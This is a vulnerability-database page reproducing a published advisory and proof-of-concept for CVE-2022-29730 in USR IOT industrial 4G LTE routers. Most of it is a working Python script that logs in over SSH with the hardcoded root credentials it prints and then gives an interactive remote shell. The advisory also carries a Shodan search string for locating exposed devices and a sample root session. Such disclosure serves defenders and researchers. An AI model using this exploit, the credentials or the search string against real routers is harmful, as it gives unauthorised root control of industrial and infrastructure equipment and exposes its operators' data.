Vulners
Lucene search
USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2022-29730 | 2 Jun 202214:15 | – | attackerkb |
 | USR IOT 4G LTE Industrial Cellular VPN Router 信任管理问题漏洞 | 2 Jun 202200:00 | – | cnnvd |
 | CVE-2022-29730 | 27 May 202212:56 | – | cve |
 | CVE-2022-29730 | 27 May 202212:56 | – | cvelist |
 | EUVD-2022-34053 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-29730 | 2 Jun 202214:15 | – | nvd |
 | Hardcoded credentials | 2 Jun 202214:15 | – | prion |
 | CVE-2022-29730 | 22 May 202522:45 | – | redhatcve |
<html><body><p>#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
# 1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is a industrial 4G wireless LTE router which provides
# a solution for users to connect own device to 4G network via WiFi interface
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
# can support 580MHz working frequency and can be widely used in Smart Grid,
# Smart Home, public bus and Vending machine for data transmission at high
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
# flow control and has many advantages including high reliability, simple
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
# WLAN interface, 4G interface. USR-G806 provides various networking mode
# to help user establish own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These sets of credentials are never
# exposed to the end-user and cannot be changed through any normal operation
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device. The password is also the default WLAN password.
# Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
# # exit
#
# lqwrm@metalgear:~$
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
# OpenWrt/Linaro GCC 4.8-2014.04
# Ralink SoC MT7628 PCIe RC mode
# BusyBox v1.22.1
# uhttpd
# Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#
import paramiko as bah
import sys as baaaaaah
bnr='''
▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄
█▪██▌▐█ ▀. ▀▄ █·██ ▪ •██
█▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪
▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·
▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄
▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █·
▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄
██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌
·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀
▀▄ █·▪ ▪ •██
▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪
▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·
▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·
▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.
▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄
▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█
▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀
'''
print(bnr)
if len(baaaaaah.argv)<2:
print('--Gief me an IP.')
exit(0)
adrs=baaaaaah.argv[1]
unme='usr'
pwrd='www.usr.cn'
rsh=bah.SSHClient()
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
print('--Got rewt!')
except:
print('--Backdoor removed.')
exit(-1)
while True:
cmnd=input('# ')
if cmnd=='exit':
rsh.exec_command('exit')
break
stdin,stdout,stderr = rsh.exec_command(cmnd)
print(stdout.read().decode().strip())
rsh.close()
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Apr 2022 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
CVSS 210
EPSS0.00643